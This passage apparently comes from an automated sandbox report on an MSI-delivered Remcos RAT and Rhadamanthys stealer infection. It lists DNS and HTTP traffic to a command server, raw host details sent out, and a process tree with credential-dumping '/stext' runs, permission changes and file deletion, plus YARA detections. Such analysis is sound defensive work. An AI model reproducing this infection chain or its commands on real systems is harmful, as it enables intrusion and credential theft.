                                                                                                                                                              Nov 21, 2024 11:27:27.325759888 CET53620771.1.1.1192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.325839996 CET53523341.1.1.1192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.326067924 CET53615451.1.1.1192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:27.326612949 CET53539191.1.1.1192.168.2.9

                                                                                                                                                              DNS Queries

                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                              Nov 21, 2024 11:26:51.066031933 CET192.168.2.91.1.1.10xc059Standard query (0)rm.anonbaba.netA (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:26:55.007359028 CET192.168.2.91.1.1.10xfc11Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:13.991122007 CET192.168.2.91.1.1.10x67edStandard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:13.992580891 CET192.168.2.91.1.1.10xe294Standard query (0)time-a-g.nist.govA (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:13.992774963 CET192.168.2.91.1.1.10x639eStandard query (0)ts1.aco.netA (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:13.992835045 CET192.168.2.91.1.1.10x3496Standard query (0)ntp.nict.jpA (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:13.993098974 CET192.168.2.91.1.1.10x72c8Standard query (0)ntp.time.in.uaA (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:13.993211031 CET192.168.2.91.1.1.10xca91Standard query (0)ntp1.net.berkeley.eduA (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:27.099360943 CET192.168.2.91.1.1.10xdeedStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:27.099833965 CET192.168.2.91.1.1.10x5448Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:27.100174904 CET192.168.2.91.1.1.10x5abbStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:27.100630999 CET192.168.2.91.1.1.10x4cc1Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                                              DNS Answers

                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                              Nov 21, 2024 11:26:51.315473080 CET1.1.1.1192.168.2.90xc059No error (0)rm.anonbaba.net179.43.171.197A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:26:55.234137058 CET1.1.1.1192.168.2.90xfc11No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:14.217262983 CET1.1.1.1192.168.2.90x67edNo error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:14.219158888 CET1.1.1.1192.168.2.90xe294No error (0)time-a-g.nist.gov129.6.15.28A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:14.219232082 CET1.1.1.1192.168.2.90x72c8No error (0)ntp.time.in.ua62.149.0.30A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:14.219321966 CET1.1.1.1192.168.2.90x3496No error (0)ntp.nict.jp61.205.120.130A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:14.219321966 CET1.1.1.1192.168.2.90x3496No error (0)ntp.nict.jp133.243.238.163A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:14.219321966 CET1.1.1.1192.168.2.90x3496No error (0)ntp.nict.jp133.243.238.244A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:14.219321966 CET1.1.1.1192.168.2.90x3496No error (0)ntp.nict.jp133.243.238.164A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:14.219321966 CET1.1.1.1192.168.2.90x3496No error (0)ntp.nict.jp133.243.238.243A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:14.220230103 CET1.1.1.1192.168.2.90xca91No error (0)ntp1.net.berkeley.edu169.229.128.134A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:14.232342958 CET1.1.1.1192.168.2.90x639eNo error (0)ts1.aco.net193.171.23.163A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:27.325759888 CET1.1.1.1192.168.2.90xdeedNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:27.325759888 CET1.1.1.1192.168.2.90xdeedNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:27.325839996 CET1.1.1.1192.168.2.90x5abbNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:27.325839996 CET1.1.1.1192.168.2.90x5abbNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:27.326067924 CET1.1.1.1192.168.2.90x5448No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                              Nov 21, 2024 11:27:27.326612949 CET1.1.1.1192.168.2.90x4cc1No error (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                              • geoplugin.net

                                                                                                                                                              HTTP Packets

                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              0192.168.2.949717178.237.33.50806316C:\Users\user\task.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 21, 2024 11:26:55.359579086 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                                                              Host: geoplugin.net
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Nov 21, 2024 11:26:56.599136114 CET1170INHTTP/1.1 200 OK
                                                                                                                                                              date: Thu, 21 Nov 2024 10:26:56 GMT
                                                                                                                                                              server: Apache
                                                                                                                                                              content-length: 962
                                                                                                                                                              content-type: application/json; charset=utf-8
                                                                                                                                                              cache-control: public, max-age=300
                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                                                                                              Data Ascii: { "geoplugin_request":"8.46.123.75", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              0192.168.2.949740179.43.171.1964431872C:\Windows\System32\dllhost.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-11-21 10:27:44 UTC2OUTData Raw: 0d 0a
                                                                                                                                                              Data Ascii:
                                                                                                                                                              2024-11-21 10:27:44 UTC169OUTData Raw: 74 d8 f6 08 2f 86 9d 90 1d 01 a1 43 00 a1 53 01 a1 42 ce 67 3e f9 9e a1 50 91 86 a1 4e d9 26 7b 45 33 42 39 32 45 41 41 2d 46 35 43 37 2d 34 37 46 38 2d 41 34 38 37 2d 46 34 36 36 46 34 32 30 33 35 41 31 7d a1 44 d9 2a 49 6e 74 65 6c 28 52 29 20 38 32 35 37 34 4c 20 47 69 67 61 62 69 74 20 4e 65 74 77 6f 72 6b 20 43 6f 6e 6e 65 63 74 69 6f 6e a1 41 ab 31 39 32 2e 31 36 38 2e 32 2e 39 a1 4b ad 32 35 35 2e 32 35 35 2e 32 35 35 2e 30 a1 4d c4 06 ec f4 bb 45 f6 9d a1 47 ab 31 39 32 2e 31 36 38 2e 32 2e 31
                                                                                                                                                              Data Ascii: t/CSBg>PN&{E3B92EAA-F5C7-47F8-A487-F466F42035A1}D*Intel(R) 82574L Gigabit Network ConnectionA192.168.2.9K255.255.255.0MEG192.168.2.1


                                                                                                                                                              Statistics

                                                                                                                                                              CPU Usage

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Memory Usage

                                                                                                                                                              Click to jump to process

                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                              Behavior

                                                                                                                                                              Click to jump to process

                                                                                                                                                              System Behavior

                                                                                                                                                              General

                                                                                                                                                              Target ID:0
                                                                                                                                                              Start time:05:26:32
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\wE1inOhJA5.msi"
                                                                                                                                                              Imagebase:0x7ff63ebe0000
                                                                                                                                                              File size:69'632 bytes
                                                                                                                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:2
                                                                                                                                                              Start time:05:26:32
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                              Imagebase:0x7ff63ebe0000
                                                                                                                                                              File size:69'632 bytes
                                                                                                                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:3
                                                                                                                                                              Start time:05:26:33
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding E1280F90D0867DD413F7EEEF5D19EFB6
                                                                                                                                                              Imagebase:0x6f0000
                                                                                                                                                              File size:59'904 bytes
                                                                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:4
                                                                                                                                                              Start time:05:26:34
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
                                                                                                                                                              Imagebase:0x910000
                                                                                                                                                              File size:29'696 bytes
                                                                                                                                                              MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:5
                                                                                                                                                              Start time:05:26:34
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:6
                                                                                                                                                              Start time:05:26:34
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
                                                                                                                                                              Imagebase:0xbd0000
                                                                                                                                                              File size:53'248 bytes
                                                                                                                                                              MD5 hash:544B0DBFF3F393BCE8BB9D815F532D51
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:moderate
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:7
                                                                                                                                                              Start time:05:26:35
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:8
                                                                                                                                                              Start time:05:26:36
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:40'376 bytes
                                                                                                                                                              MD5 hash:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000008.00000002.1571921794.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:9
                                                                                                                                                              Start time:05:26:39
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\apps.bat" "
                                                                                                                                                              Imagebase:0xc50000
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:10
                                                                                                                                                              Start time:05:26:39
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:13
                                                                                                                                                              Start time:05:26:39
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7880 -s 976
                                                                                                                                                              Imagebase:0x160000
                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:16
                                                                                                                                                              Start time:05:26:49
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files"
                                                                                                                                                              Imagebase:0xc50000
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:17
                                                                                                                                                              Start time:05:26:49
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:18
                                                                                                                                                              Start time:05:26:49
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\apps.bat" "
                                                                                                                                                              Imagebase:0x7ff7fb2c0000
                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:19
                                                                                                                                                              Start time:05:26:49
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\." /SETINTEGRITYLEVEL (CI)(OI)LOW
                                                                                                                                                              Imagebase:0x910000
                                                                                                                                                              File size:29'696 bytes
                                                                                                                                                              MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:20
                                                                                                                                                              Start time:05:26:49
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:21
                                                                                                                                                              Start time:05:26:49
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:22
                                                                                                                                                              Start time:05:26:50
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Users\user\task.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"task.exe"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:40'376 bytes
                                                                                                                                                              MD5 hash:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.4490232230.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Antivirus matches:
                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:24
                                                                                                                                                              Start time:05:26:57
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Users\user\task.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\gifwhgt"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:40'376 bytes
                                                                                                                                                              MD5 hash:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:25
                                                                                                                                                              Start time:05:26:57
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Users\user\task.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\user\task.exe
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:40'376 bytes
                                                                                                                                                              MD5 hash:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000019.00000003.1668759956.0000000002D70000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000019.00000003.1674900501.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000019.00000003.1662192131.0000000000580000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000019.00000003.1668306416.0000000002B50000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:26
                                                                                                                                                              Start time:05:26:57
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Users\user\task.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\jckohyeeyyu"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:40'376 bytes
                                                                                                                                                              MD5 hash:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:27
                                                                                                                                                              Start time:05:26:57
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Users\user\task.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\tfphirpfmgmayj"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:40'376 bytes
                                                                                                                                                              MD5 hash:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:28
                                                                                                                                                              Start time:05:26:58
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\apps.bat" "
                                                                                                                                                              Imagebase:0x7ff7fb2c0000
                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:29
                                                                                                                                                              Start time:05:26:58
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
